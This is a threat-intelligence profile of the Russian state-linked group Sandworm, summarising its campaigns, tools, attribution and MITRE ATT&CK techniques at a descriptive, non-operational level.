Under Review ACTIVE

Sandworm

Also known as: IRIDIUM, TeleBots, Voodoo Bear, ELECTRUM, Iron Viking, Seashell Blizzard

Affiliation Russia (GRU Unit 74455)

Motivation Destructive / Espionage

Status active

Country Russia

First Seen 2009

Last Seen 2025

Target Sectors Energy & Utilities, Government, Transportation, Financial Services, Media

Target Geographies Ukraine, Europe, United States, Global

Executive Summary

Sandworm is a Russian state-sponsored threat actor attributed to GRU Unit 74455, the Main Centre for Special Technologies (GTsST) of the Russian military intelligence service. Active since at least 2009, the group is one of the most destructive cyber threat actors documented to date. Sandworm conducts operations ranging from strategic espionage to large-scale destructive attacks against critical infrastructure, with a sustained operational focus on Ukraine.

The group is responsible for the first confirmed cyberattacks against electrical power grids (Ukraine, 2015 and 2016), the NotPetya global wiper attack (2017) that caused an estimated $10 billion in damages, the Olympic Destroyer attack against the 2018 Pyeongchang Winter Olympics, and multiple destructive operations during Russia’s 2022 invasion of Ukraine. Sandworm’s readiness to deploy destructive capabilities against civilian infrastructure sets it apart from other state-sponsored groups.

Notable Campaigns

2015 — Ukraine Power Grid Attack (BlackEnergy3)

On December 23, 2015, Sandworm conducted the first confirmed cyberattack to cause a power outage. The group compromised three Ukrainian power distribution companies using BlackEnergy3 malware. Operators manually manipulated SCADA systems to open circuit breakers, cutting power to approximately 225,000 customers for up to six hours.

2016 — Ukraine Power Grid Attack (Industroyer/CrashOverride)

On December 17, 2016, Sandworm deployed Industroyer (CrashOverride), a modular ICS-specific malware framework targeting the Ukrenergo transmission substation in Kyiv. Industroyer directly interfaced with industrial control protocols (IEC 61850, IEC 104, OPC DA) to open circuit breakers, representing an advancement from manual SCADA manipulation to automated ICS exploitation.

2017 — NotPetya Global Destructive Attack

In June 2017, Sandworm deployed the NotPetya wiper via a supply chain compromise of M.E.Doc, a Ukrainian tax accounting application. NotPetya spread globally via EternalBlue (CVE-2017-0144) and Mimikatz credential harvesting, causing an estimated $10 billion in damages to organizations including Maersk, Merck, FedEx/TNT Express, and Mondelez. The malware had no functional decryption mechanism despite appearing as ransomware.

2018 — Olympic Destroyer

Sandworm deployed Olympic Destroyer malware against the 2018 Pyeongchang Winter Olympics opening ceremony IT infrastructure. The attack incorporated multiple false flag indicators designed to mislead attribution toward North Korean or Chinese actors. It disrupted Wi-Fi, ticketing systems, and the official Olympics website.

2022 — AcidRain and Wiper Campaign

In coordination with Russia’s February 2022 invasion of Ukraine, Sandworm deployed AcidRain wiper malware against Viasat KA-SAT modems, disrupting satellite communications across Ukraine and parts of Europe. Throughout 2022, the group deployed multiple wiper variants (CaddyWiper, HermeticWiper, IsaacWiper) against Ukrainian government and infrastructure targets.

Technical Capabilities

Sandworm maintains advanced capabilities across both IT and operational technology (OT) environments. The group develops custom ICS-targeting malware, including Industroyer/CrashOverride, which contains modules for multiple industrial communication protocols. BlackEnergy evolved through three major versions, from a DDoS toolkit to a full-featured espionage and ICS attack platform.

The group’s IT-focused tools include destructive malware (NotPetya, Olympic Destroyer, CaddyWiper), supply chain compromise techniques, and exploitation of network infrastructure. Cyclops Blink, disclosed by NCSC/CISA in 2022, was a modular botnet framework targeting WatchGuard and ASUS network devices, replacing the disrupted VPNFilter botnet.

Sandworm employs advanced operational security including false flag techniques (Olympic Destroyer contained code artifacts intended to mislead attribution), living-off-the-land techniques, and multi-stage attack chains combining IT network compromise with OT-specific payloads.

Attribution

The U.S. Department of Justice indicted six GRU officers of Unit 74455 in October 2020, providing evidence linking Sandworm to the BlackEnergy Ukraine grid attacks, NotPetya, Olympic Destroyer, and operations against the OPCW and Georgian organizations. The named individuals were identified as members of the GTsST.

CISA advisory AA22-110A (April 2022) and joint advisories from Five Eyes intelligence agencies corroborated the attribution. Private-sector research from ESET, Mandiant, Dragos, and Microsoft independently tracked the group’s infrastructure, malware development patterns, and operational timelines. Sandworm’s targeting patterns are consistent with Russian strategic military objectives.

MITRE ATT&CK Profile

Initial Access: Sandworm uses spearphishing (T1566), supply chain compromise (T1195.002), and exploitation of public-facing applications (T1190) including VPN appliances and web servers.

Execution: The group leverages PowerShell (T1059.001), Windows Management Instrumentation (T1047), and custom loaders. ICS-specific tools directly manipulate industrial protocols.

Persistence: Scheduled tasks (T1053), web shells (T1505.003), and firmware-level implants on network devices (Cyclops Blink) maintain access.

Impact: Sandworm’s hallmark is destructive impact through data destruction (T1485), disk wiping (T1561), and manipulation of industrial control systems. NotPetya combined MBR corruption with file encryption using a non-functional key.

Defense Evasion: False flag operations (Olympic Destroyer), timestomping, indicator removal, and process injection complicate attribution and evade detection.